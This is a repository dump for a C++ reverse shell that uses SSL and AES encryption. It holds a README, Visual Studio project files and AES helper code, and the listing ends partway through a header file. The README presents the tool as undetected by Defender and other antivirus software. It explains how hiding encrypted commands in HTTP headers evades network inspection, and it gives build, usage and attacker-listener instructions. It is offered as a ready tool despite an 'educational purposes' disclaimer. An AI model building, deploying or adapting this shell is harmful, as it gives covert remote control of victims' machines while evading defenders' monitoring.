├── OpenSSLWin64.zip
├── Readme.md
├── SSLReverseShell
    ├── .vs
    │   └── SSLReverseShell
    │   │   ├── FileContentIndex
    │   │       ├── bda00eff-df27-43f9-94e5-5b9ff666d46b.vsidx
    │   │       ├── ce5e1443-33eb-47eb-8d88-71a01c3e25bd.vsidx
    │   │       └── fc7a23c9-3027-43be-9564-5adb955bc352.vsidx
    │   │   └── v17
    │   │       ├── .suo
    │   │       ├── Browse.VC.db
    │   │       ├── DocumentLayout.backup.json
    │   │       ├── DocumentLayout.json
    │   │       └── Solution.VC.db
    ├── SSLReverseShell.sln
    ├── SSLReverseShell
    │   ├── AES_CBC.cpp
    │   ├── AES_CBC.h
    │   ├── SSLReverseShell.cpp
    │   ├── SSLReverseShell.vcxproj
    │   ├── SSLReverseShell.vcxproj.filters
    │   ├── SSLReverseShell.vcxproj.user
    │   └── x64
    │   │   └── Release
    │   │       ├── SSLReverseShell.Build.CppClean.log
    │   │       ├── SSLReverseShell.exe.recipe
    │   │       ├── SSLReverseShell.log
    │   │       └── SSLReverseShell.vcxproj.FileListAbsolute.txt
    └── x64
    │   └── Release
    │       ├── SSLReverseShell.exe
    │       └── SSLReverseShell.pdb
├── images
    ├── Include.png
    ├── Linker1.png
    ├── Linker2.png
    └── MT.png
└── sslserver.py


/OpenSSLWin64.zip:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/OpenSSLWin64.zip


--------------------------------------------------------------------------------
/Readme.md:
--------------------------------------------------------------------------------
  1 | # Encrypted SSL/TLS C++ Reverse Shell (HTTPS)
  2 | <b><span style="color:green;">✅ Status: Undetected (Tested on couple AV solutions including Defender)</span></b>
  3 | 
  4 | ## Overview
  5 | When it comes to SSL/TLS reverse shells, the publicly available options are often limited to:
  6 | - **Using `msfvenom` to generate an HTTPS reverse shell (Signatured)**.
  7 | - **Using a PowerShell / Python payload (high level languages)**.
  8 | 
  9 | ### Why Do We Need One?
 10 | Using a standard reverse shell often results in unencrypted traffic, which can be easily flagged by **Network Detection and Response (NDR)** systems or firewalls. These tools inspect network traffic and can identify remote code execution patterns, blocking the binary and alerting defenders.
 11 | 
 12 | An encrypted reverse shell helps evade such detection by:
 13 | 1. Encrypting all communication, making it harder for network tools to inspect the traffic.
 14 | 2. Using SSL to blend in with legitimate HTTPS traffic.
 15 | 
 16 | To address this gap, I created a simple **C++ SSL Reverse Shell** POC (commented and explained):
 17 | - **Undetected** by Microsoft Defender and some other AV solutions at the time of publishing.
 18 | - Enables secure communication via SSL, reducing the chance of detection.
 19 | - Using AES Encryption / Decryption and embedding the results and commands within HTTP headers to bypass deep packet inspection.
 20 | 
 21 | > **Note**: I tested the binary against a limited set of antivirus solutions, and results may vary across environments.
 22 | 
 23 | ---
 24 | 
 25 | ## Purpose of the POC
 26 | 
 27 | This Proof of Concept (POC) demonstrates how to build a reverse shell that utilizes **SSL/TLS encryption** and **AES encryption/decryption** to achieve secure communication between the attacker and the target. The main objectives and functionality of this POC are as follows:
 28 | 
 29 | - **Avoid Detection**: By using SSL/TLS (the same protocol used for legitimate HTTPS traffic), the reverse shell traffic blends in with regular encrypted web traffic, making it much harder to detect by Network Detection and Response (NDR) systems or firewalls.
 30 | - **Encrypted Communication**: The communication between the client (target) and the attacker is encrypted using **AES** (Advanced Encryption Standard). This ensures that even if the traffic is intercepted, it cannot be easily read or tampered with without the correct decryption key.
 31 | - **Command Execution in Encrypted Form**: Commands are **encrypted** on the server side and sent to the client over the SSL connection. The client decrypts these commands, executes them, and then sends back the encrypted output to the attacker.
 32 | - **Embedding Commands in HTTP Headers**: The encrypted command is embedded within a custom HTTP header (`X-Command`), allowing it to pass through web proxies, firewalls, or any other inspection system that may be scanning traffic for unusual activity. This technique makes the reverse shell more difficult to detect by conventional network traffic analysis tools.
 33 | - **Simulating Legitimate HTTPS Traffic**: By using HTTPS (SSL/TLS) and embedding encrypted payloads within HTTP headers, the reverse shell traffic appears as regular secure web traffic, which helps evade deep packet inspection (DPI) systems that are typically used to identify malicious traffic patterns.
 34 | - **Encrypted Results Sent Back**: The results of the executed commands are also encrypted using **AES** and sent back to the attacker through the SSL connection. This ensures that the response is equally protected and remains secure during transmission, preventing interception , tampering or detection by unauthorized parties.
 35 | 
 36 | The goal of this POC is to illustrate a method of bypassing common network security mechanisms by employing common, but underused, techniques to maintain the confidentiality and integrity of the communication channel. It is important to note that while the reverse shell is **undetected** by some AV solutions, it is **not guaranteed** to bypass all defenses.
 37 | 
 38 | ---
 39 | 
 40 | ## Setup Instructions
 41 | Follow these steps to set up the project:
 42 | 
 43 | 1. **Download the Necessary Files**:
 44 |    - Clone the repository:  
 45 |      ```bash
 46 |      git clone https://github.com/V-i-x-x/SSLReverseShell.git
 47 |      ```
 48 |    - Download `OpenSSLWin64.zip` (linked in the repository).
 49 | 
 50 | 2. **Extract OpenSSL Libraries**:
 51 |    - Unzip `OpenSSLWin64.zip` into a folder of your choice.  
 52 |      For example, in the project, I placed it in the `C:\` directory.
 53 | 
 54 |      ```plaintext
 55 |      C:\OpenSSLWin64
 56 |      ```
 57 | 
 58 | 3. **Compile the Project**:
 59 |    - Ensure the project includes the OpenSSL libraries for successful compilation into a single `.exe` binary.
 60 | 
 61 | ---
 62 | 
 63 | ## Additional Notes
 64 | - **OpenSSLWin64**: This is the precompiled SSL library required for the project. Ensure it is correctly set up to avoid linking issues.
 65 | - **Testing**: While the binary is undetectable by some AV solutions as of now, this is not guaranteed against all antivirus software or future updates.
 66 | 
 67 | ---
 68 | 
 69 | ## Configuration In Visual Studio
 70 | 
 71 | 1- Go to C/C++ → Code Generation → Runtime Library.  
 72 | Set this to Multi-threaded (/MT) to ensure that your application links statically against the runtime libraries, which helps in creating a single binary.
 73 | 
 74 | ![Local Image](./images/MT.png "MT FLAG")
 75 | 
 76 | 2- Configuration Properties > C/C++ > General, add the path to the OpenSSL include directory (C:\OpenSSLWin64\install\include) to Additional Include Directories.
 77 | 
 78 | ![Local Image](./images/Include.png "Include Libraries")
 79 | 
 80 | 3- Under Configuration Properties > Linker > General, add the path to the OpenSSL library directory (C:\OpenSSLWin64\install\lib) to Additional Library Directories
 81 | 
 82 | ![Local Image](./images/Linker1.png "Linker.png")
 83 | 
 84 | 4- Under Configuration Properties > Linker > Input, add the following to Additional Dependencies:  
 85 | C:\OpenSSLWin64\install\lib\libssl.lib  
 86 | C:\OpenSSLWin64\install\lib\libcrypto.lib
 87 | 
 88 | ![Local Image](./images/Linker2.png "Linker.png")
 89 | 
 90 | ---
 91 | 
 92 | ## Usage
 93 | 
 94 | ```
 95 | Usage: C:\Users\Vixx\Downloads\SSLReverseShell.exe <ATTACKER_IP> <ATTACKER_PORT>
 96 | Example: SSLReverseShell.exe 192.168.100.10 443
 97 | ```
 98 | 
 99 | ---
100 | 
101 | ## Capture the reverse shell in your Kali OS
102 | 
103 | 1- Generate a New RSA Private Key and Self-Signed Certificate (Containing the Public Key)
104 | ```
105 | openssl req -newkey rsa:2048 -nodes -keyout attacker.key -x509 -days 365 -out attacker.crt
106 | ```
107 | 2- Python Script will be the server to capture the shell and send the command back to client (encrypted with aes)
108 | - Install required library
109 | 
110 | ```
111 | pip3 install pycryptodome
112 | ```
113 | - Start the Server
114 | ```
115 | ┌──(kali㉿kali)-[~/Desktop/pen-300/sslrevshell]
116 | └─$ python3 sslserverv1.3.py      
117 | [*] Listening on 0.0.0.0:443
118 | ```
119 | ---
120 | 
121 | ### Disclaimer
122 | This project is for **educational purposes only**. Unauthorized use of this tool in production or against systems without explicit permission is strictly prohibited.
123 | 


--------------------------------------------------------------------------------
/SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/bda00eff-df27-43f9-94e5-5b9ff666d46b.vsidx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/bda00eff-df27-43f9-94e5-5b9ff666d46b.vsidx


--------------------------------------------------------------------------------
/SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/ce5e1443-33eb-47eb-8d88-71a01c3e25bd.vsidx:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/ce5e1443-33eb-47eb-8d88-71a01c3e25bd.vsidx


--------------------------------------------------------------------------------
/SSLReverseShell/.vs/SSLReverseShell/FileContentIndex/fc7a23c9-3027-43be-9564-5adb955bc352.vsidx:
--------------------------------------------------------------------------------
1 | CDGG	'3


--------------------------------------------------------------------------------
/SSLReverseShell/.vs/SSLReverseShell/v17/.suo:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/SSLReverseShell/.vs/SSLReverseShell/v17/.suo


--------------------------------------------------------------------------------
/SSLReverseShell/.vs/SSLReverseShell/v17/Browse.VC.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/SSLReverseShell/.vs/SSLReverseShell/v17/Browse.VC.db


--------------------------------------------------------------------------------
/SSLReverseShell/.vs/SSLReverseShell/v17/DocumentLayout.backup.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "Version": 1,
 3 |   "WorkspaceRootPath": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\",
 4 |   "Documents": [
 5 |     {
 6 |       "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
 7 |       "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\SSLReverseShell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
 8 |     },
 9 |     {
10 |       "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
11 |       "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\AES_CBC.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
12 |     },
13 |     {
14 |       "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
15 |       "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\AES_CBC.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
16 |     },
17 |     {
18 |       "AbsoluteMoniker": "D:0:0:{A2FE74E1-B743-11D0-AE1A-00A0C90FFFC3}|\u003CMiscFiles\u003E|C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
19 |     }
20 |   ],
21 |   "DocumentGroupContainers": [
22 |     {
23 |       "Orientation": 0,
24 |       "VerticalTabListWidth": 256,
25 |       "DocumentGroups": [
26 |         {
27 |           "DockedWidth": 200,
28 |           "SelectedChildIndex": 3,
29 |           "Children": [
30 |             {
31 |               "$type": "Document",
32 |               "DocumentIndex": 2,
33 |               "Title": "AES_CBC.h",
34 |               "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h",
35 |               "RelativeDocumentMoniker": "SSLReverseShell\\AES_CBC.h",
36 |               "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h",
37 |               "RelativeToolTip": "SSLReverseShell\\AES_CBC.h",
38 |               "ViewState": "AgIAAAAAAAAAAAAAAAAAAAgAAAAfAAAAAAAAAA==",
39 |               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
40 |               "WhenOpened": "2024-11-24T15:13:33.656Z"
41 |             },
42 |             {
43 |               "$type": "Document",
44 |               "DocumentIndex": 1,
45 |               "Title": "AES_CBC.cpp",
46 |               "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp",
47 |               "RelativeDocumentMoniker": "SSLReverseShell\\AES_CBC.cpp",
48 |               "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp",
49 |               "RelativeToolTip": "SSLReverseShell\\AES_CBC.cpp",
50 |               "ViewState": "AgIAAAAAAAAAAAAAAAAAAFsAAAAAAAAAAAAAAA==",
51 |               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
52 |               "WhenOpened": "2024-11-24T15:13:29.346Z"
53 |             },
54 |             {
55 |               "$type": "Document",
56 |               "DocumentIndex": 3,
57 |               "Title": "apiset.h",
58 |               "DocumentMoniker": "C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
59 |               "RelativeDocumentMoniker": "..\\..\\..\\..\\..\\..\\..\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
60 |               "ToolTip": "C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
61 |               "RelativeToolTip": "..\\..\\..\\..\\..\\..\\..\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
62 |               "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
63 |               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
64 |               "WhenOpened": "2024-09-26T10:51:44.243Z"
65 |             },
66 |             {
67 |               "$type": "Document",
68 |               "DocumentIndex": 0,
69 |               "Title": "SSLReverseShell.cpp",
70 |               "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp",
71 |               "RelativeDocumentMoniker": "SSLReverseShell\\SSLReverseShell.cpp",
72 |               "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp",
73 |               "RelativeToolTip": "SSLReverseShell\\SSLReverseShell.cpp",
74 |               "ViewState": "AgIAAJgAAAAAAAAAAAAIwJ8AAABNAAAAAAAAAA==",
75 |               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
76 |               "WhenOpened": "2024-09-26T08:45:51.878Z",
77 |               "EditorCaption": ""
78 |             }
79 |           ]
80 |         }
81 |       ]
82 |     }
83 |   ]
84 | }


--------------------------------------------------------------------------------
/SSLReverseShell/.vs/SSLReverseShell/v17/DocumentLayout.json:
--------------------------------------------------------------------------------
 1 | {
 2 |   "Version": 1,
 3 |   "WorkspaceRootPath": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\",
 4 |   "Documents": [
 5 |     {
 6 |       "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
 7 |       "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\SSLReverseShell.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
 8 |     },
 9 |     {
10 |       "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
11 |       "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\AES_CBC.cpp||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
12 |     },
13 |     {
14 |       "AbsoluteMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}",
15 |       "RelativeMoniker": "D:0:0:{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}|SSLReverseShell\\SSLReverseShell.vcxproj|solutionrelative:SSLReverseShell\\AES_CBC.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
16 |     },
17 |     {
18 |       "AbsoluteMoniker": "D:0:0:{A2FE74E1-B743-11D0-AE1A-00A0C90FFFC3}|\u003CMiscFiles\u003E|C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h||{D0E1A5C6-B359-4E41-9B60-3365922C2A22}"
19 |     }
20 |   ],
21 |   "DocumentGroupContainers": [
22 |     {
23 |       "Orientation": 0,
24 |       "VerticalTabListWidth": 256,
25 |       "DocumentGroups": [
26 |         {
27 |           "DockedWidth": 200,
28 |           "SelectedChildIndex": 3,
29 |           "Children": [
30 |             {
31 |               "$type": "Document",
32 |               "DocumentIndex": 2,
33 |               "Title": "AES_CBC.h",
34 |               "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h",
35 |               "RelativeDocumentMoniker": "SSLReverseShell\\AES_CBC.h",
36 |               "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.h",
37 |               "RelativeToolTip": "SSLReverseShell\\AES_CBC.h",
38 |               "ViewState": "AgIAAAAAAAAAAAAAAAAAAAgAAAAfAAAAAAAAAA==",
39 |               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
40 |               "WhenOpened": "2024-11-24T15:13:33.656Z"
41 |             },
42 |             {
43 |               "$type": "Document",
44 |               "DocumentIndex": 1,
45 |               "Title": "AES_CBC.cpp",
46 |               "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp",
47 |               "RelativeDocumentMoniker": "SSLReverseShell\\AES_CBC.cpp",
48 |               "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\AES_CBC.cpp",
49 |               "RelativeToolTip": "SSLReverseShell\\AES_CBC.cpp",
50 |               "ViewState": "AgIAAAAAAAAAAAAAAAAAAFsAAAAAAAAAAAAAAA==",
51 |               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
52 |               "WhenOpened": "2024-11-24T15:13:29.346Z"
53 |             },
54 |             {
55 |               "$type": "Document",
56 |               "DocumentIndex": 3,
57 |               "Title": "apiset.h",
58 |               "DocumentMoniker": "C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
59 |               "RelativeDocumentMoniker": "..\\..\\..\\..\\..\\..\\..\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
60 |               "ToolTip": "C:\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
61 |               "RelativeToolTip": "..\\..\\..\\..\\..\\..\\..\\Program Files (x86)\\Windows Kits\\10\\Include\\10.0.22621.0\\shared\\apiset.h",
62 |               "ViewState": "AgIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==",
63 |               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000680|",
64 |               "WhenOpened": "2024-09-26T10:51:44.243Z"
65 |             },
66 |             {
67 |               "$type": "Document",
68 |               "DocumentIndex": 0,
69 |               "Title": "SSLReverseShell.cpp",
70 |               "DocumentMoniker": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp",
71 |               "RelativeDocumentMoniker": "SSLReverseShell\\SSLReverseShell.cpp",
72 |               "ToolTip": "C:\\Users\\Vixx\\Desktop\\Tools\\PEN-300\\CSA Containers\\SSLReverseShell\\SSLReverseShell\\SSLReverseShell.cpp",
73 |               "RelativeToolTip": "SSLReverseShell\\SSLReverseShell.cpp",
74 |               "ViewState": "AgIAAJgAAAAAAAAAAAAIwJ4AAAAAAAAAAAAAAA==",
75 |               "Icon": "ae27a6b0-e345-4288-96df-5eaf394ee369.000677|",
76 |               "WhenOpened": "2024-09-26T08:45:51.878Z",
77 |               "EditorCaption": ""
78 |             }
79 |           ]
80 |         }
81 |       ]
82 |     }
83 |   ]
84 | }


--------------------------------------------------------------------------------
/SSLReverseShell/.vs/SSLReverseShell/v17/Solution.VC.db:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/V-i-x-x/SSL-AES-Reverse-Shell/b159e2feddac4b0b2f9a6e400854ac3b90b7fcee/SSLReverseShell/.vs/SSLReverseShell/v17/Solution.VC.db


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.11.35222.181
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "SSLReverseShell", "SSLReverseShell\SSLReverseShell.vcxproj", "{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}.Debug|x64.Build.0 = Debug|x64
18 | 		{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}.Debug|x86.Build.0 = Debug|Win32
20 | 		{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}.Release|x64.ActiveCfg = Release|x64
21 | 		{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}.Release|x64.Build.0 = Release|x64
22 | 		{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}.Release|x86.ActiveCfg = Release|Win32
23 | 		{CFBCCCB3-F5D8-47E5-AA84-40AD41CB8408}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {3076E98E-5246-47C1-B907-5949E37B1D3B}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/AES_CBC.cpp:
--------------------------------------------------------------------------------
 1 | #include "AES_CBC.h"
 2 | #include <sstream>
 3 | #include <vector>
 4 | 
 5 | // Constructor: Initializes the AES CBC object with a key and IV.
 6 | // Sets up encryption and decryption keys.
 7 | AES_CBC::AES_CBC(const unsigned char* key, const unsigned char* fixed_iv) {
 8 |     std::memcpy(iv, fixed_iv, AES_BLOCK_SIZE);
 9 |     AES_set_encrypt_key(key, 128, &encryptKey);
10 |     AES_set_decrypt_key(key, 128, &decryptKey);
11 | }
12 | 
13 | // Encrypt data using AES in CBC mode.
14 | // The input is plaintext, and the output is ciphertext of the specified length.
15 | void AES_CBC::encrypt(unsigned char* input, unsigned char* output, int length) {
16 |     unsigned char iv_copy[AES_BLOCK_SIZE];
17 |     std::memcpy(iv_copy, iv, AES_BLOCK_SIZE); // Copy the IV to prevent modification
18 |     AES_cbc_encrypt(input, output, length, &encryptKey, iv_copy, AES_ENCRYPT);
19 | }
20 | 
21 | // Decrypt data using AES in CBC mode.
22 | // The input is ciphertext, and the output is the decrypted plaintext.
23 | void AES_CBC::decrypt(unsigned char* input, unsigned char* output, int length) {
24 |     unsigned char iv_copy[AES_BLOCK_SIZE];
25 |     std::memcpy(iv_copy, iv, AES_BLOCK_SIZE); // Copy the IV to prevent modification
26 |     AES_cbc_encrypt(input, output, length, &decryptKey, iv_copy, AES_DECRYPT);
27 | }
28 | 
29 | // Print binary data in hexadecimal format for easier readability.
30 | void AES_CBC::printHex(unsigned char* data, int length) {
31 |     for (int i = 0; i < length; i++) {
32 |         std::cout << std::hex << std::setw(2) << std::setfill('0') << (int)data[i];
33 |     }
34 |     std::cout << std::endl;
35 | }
36 | 
37 | // Convert binary data to a hexadecimal string representation.
38 | std::string toHex(const unsigned char* data, size_t length) {
39 |     std::ostringstream hexStream;
40 |     for (size_t i = 0; i < length; ++i) {
41 |         hexStream << std::hex << std::setw(2) << std::setfill('0') << (int)data[i];
42 |     }
43 |     return hexStream.str();
44 | }
45 | 
46 | // Convert a hexadecimal string to binary data.
47 | std::vector<unsigned char> fromHex(const std::string& hex) {
48 |     std::vector<unsigned char> binary;
49 |     for (size_t i = 0; i < hex.length(); i += 2) {
50 |         unsigned char byte = std::stoi(hex.substr(i, 2), nullptr, 16);
51 |         binary.push_back(byte);
52 |     }
53 |     return binary;
54 | }
55 | 
56 | // Remove PKCS7 padding from decrypted data.
57 | // Validates padding before removing it.
58 | std::vector<unsigned char> removePadding(const std::vector<unsigned char>& data) {
59 |     size_t paddingLength = data.back(); // Last byte indicates padding length
60 |     if (paddingLength > AES_BLOCK_SIZE || paddingLength > data.size()) {
61 |         throw std::runtime_error("Invalid padding length");
62 |     }
63 |     return std::vector<unsigned char>(data.begin(), data.end() - paddingLength);
64 | }
65 | 
66 | // Decrypt a command represented as a hexadecimal string.
67 | // Converts hex to binary, decrypts the data, removes padding, and returns plaintext.
68 | std::string decryptCommand(const std::string& encryptedHex, AES_CBC& aes) {
69 |     std::vector<unsigned char> encryptedBinary = fromHex(encryptedHex); // Convert hex to binary
70 |     std::vector<unsigned char> decryptedBinary(encryptedBinary.size());
71 |     aes.decrypt(encryptedBinary.data(), decryptedBinary.data(), encryptedBinary.size()); // Decrypt
72 | 
73 |     std::vector<unsigned char> unpaddedData = removePadding(decryptedBinary); // Remove padding
74 |     return std::string(unpaddedData.begin(), unpaddedData.end()); // Convert to string
75 | }
76 | 
77 | // Encrypt a command string using AES in CBC mode.
78 | // Pads the command, encrypts it, and returns the result as a hex string.
79 | std::string encryptCommand(const std::string& command, AES_CBC& aes) {
80 |     std::vector<unsigned char> commandBinary(command.begin(), command.end()); // Convert string to binary
81 | 
82 |     int paddedLength = (commandBinary.size() / AES_BLOCK_SIZE + 1) * AES_BLOCK_SIZE; // Calculate padded length
83 |     std::vector<unsigned char> paddedData(paddedLength);
84 |     std::memcpy(paddedData.data(), commandBinary.data(), commandBinary.size()); // Copy original data
85 |     std::memset(paddedData.data() + commandBinary.size(), 0, paddedLength - commandBinary.size()); // Add padding
86 | 
87 |     std::vector<unsigned char> encryptedData(paddedLength);
88 |     aes.encrypt(paddedData.data(), encryptedData.data(), paddedLength); // Encrypt the padded data
89 | 
90 |     return toHex(encryptedData.data(), encryptedData.size()); // Convert to hex and return
91 | }
92 | 


--------------------------------------------------------------------------------
/SSLReverseShell/SSLReverseShell/AES_CBC.h:
--------------------------------------------------------------------------------
 1 | #ifndef AES_CBC_H
 2 | #define AES_CBC_H
 3 | 
 4 | #include <openssl/aes.h>
 5 | #include <cstring>
 6 | #include <iostream>
 7 | #include <iomanip>
 8 | #include <vector>
 9 | #pragma warning(disable : 4996)
10 | 
